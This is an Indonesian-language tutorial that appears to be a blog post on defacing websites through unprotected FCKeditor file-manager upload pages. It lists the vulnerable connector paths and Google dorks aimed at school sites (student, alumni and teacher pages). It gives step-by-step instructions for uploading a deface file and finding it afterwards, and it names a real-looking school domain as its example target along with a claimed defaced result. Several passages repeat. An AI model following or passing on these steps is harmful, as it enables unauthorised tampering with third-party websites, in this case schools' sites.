saya mendapatkan sedikit tutorial dari keliling keliling saya kerumah mbah google ,
langsung saja ya , tak usah banyak pikir panjang lagi , ni dia :
langsung saja ya , tak usah banyak pikir panjang lagi , ni dia :
[#] Exploit :
http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html[#]Dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?Pertama , Kita Cari Target digoogle dengan memasukan dork diatas .
tersera kalian mau coba dork yg mana .
kemudian pilih salah satu site dari google tadi :
tersera kalian mau coba dork yg mana .
kemudian pilih salah satu site dari google tadi :
Example : http://www.sman1kotabaru.sch.idLangkah selanjutnya , kita masukan Exploit di Target Tersebut :
Example : http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/test.htmlsekarang , setelah masuk
Ganti Connector ASP → PHP
Lalu , Upload File txt kamu ,
oh iya , file HTML gak bisa lo , hanya file TXT yang bisa
setelah upload , dimana tempatnya file kita tadi ?
itu mudah , langsung saja masukan
Ganti Connector ASP → PHP
Lalu , Upload File txt kamu ,
oh iya , file HTML gak bisa lo , hanya file TXT yang bisa
setelah upload , dimana tempatnya file kita tadi ?
itu mudah , langsung saja masukan
http://public_html/userfiles/file/file-deface.txt
http://public_html/userfiles/file-deface.txtdan ini hasil saya tadi:
http://www.sman1kotabaru.sch.id/userfiles/file/Tutor.txt
Yaa Sekian Dulu Tutor Dari Saya :)
